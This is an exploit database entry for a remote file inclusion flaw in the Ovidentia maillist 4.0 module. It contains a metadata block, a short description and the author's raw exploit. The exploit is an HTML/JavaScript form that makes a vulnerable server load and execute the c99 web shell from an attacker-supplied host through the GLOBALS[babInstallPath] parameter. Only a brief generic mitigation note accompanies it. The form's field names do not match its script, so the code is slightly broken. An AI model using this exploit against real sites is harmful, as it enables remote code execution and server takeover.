Ovidentia maillist 4.0 Module Remote File Inclusion Exploit

vendor:

Ovidentia Maillist

by:

bd0rk

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Ovidentia Maillist

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: NO

Related CWE: N/A

CPE: a:ovidentia:ovidentia_maillist

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu-Linux

2011

Ovidentia maillist 4.0 Module Remote File Inclusion Exploit

This exploit allows an attacker to include a remote file on the web server. The vulnerability exists in the Ovidentia maillist 4.0 Module, specifically in the mlincl.php file. The attacker can use the GLOBALS[babInstallPath] parameter to inject a malicious file from a remote server. The malicious file is then executed on the web server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Additionally, the web server should be configured to only allow access to the necessary files and directories.

Source

Exploit-DB raw data:

<!--
# Title: Ovidentia maillist 4.0 Module Remote File Inclusion Exploit
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Google-Dork: n/a-->Not for kiddies!
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fmaillist&file=maillist-4-0.zip&idf=794

PoC:

maillist-4-0/programs/mlincl.php line 4
------------------------------------------------------------------------

@include_once $GLOBALS['babInstallPath'].'utilit/registerglobals.php';

------------------------------------------------------------------------
Greetz: GoLd_M(Welcome back bro'!) :), x0r_32, Anonymous, LulzSec

----------------
~~Exploitcode~~
----------------
-->

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<script language="JavaScript">

var a="/maillist-4-0/programs/"
var b="mlincl.php"
var c="?GLOBALS[babInstallPath]="

var shellcode="http://yourshellpath.com/c99.txt?"

function it(){
xpl.action= document.xpl.victim.value+a+b+c+shellcode;xpl.submit();
}
</script>
</head>

<body bgcolor="#FFFFFF">
<p align="middle"><font color="#0000FF"><b>Ovidentia maillist 4.0 Module Remote File Inclusion Exploit</b></font></p>
<form method="post" name="xpl" onSubmit="it();">
    <p align="left">
    <b><font face="Tahoma" size="2"><font color="#FF0000">Usage</font>:http://someone/directory</a></font>
        or
        </font>
        <font face="Tahoma" size="2" color="#000000">http://someone</font><font 
size="2" face="Tahoma"></a> <font size="2">&nbps;--></font></font></b><font 
size="2" face="Tahoma">
        <input type="text" name="someone" size="20";"></p>
<center>
 
</p>
  <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" 
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
&nbps;</p>
</center>
</body>
 
</html>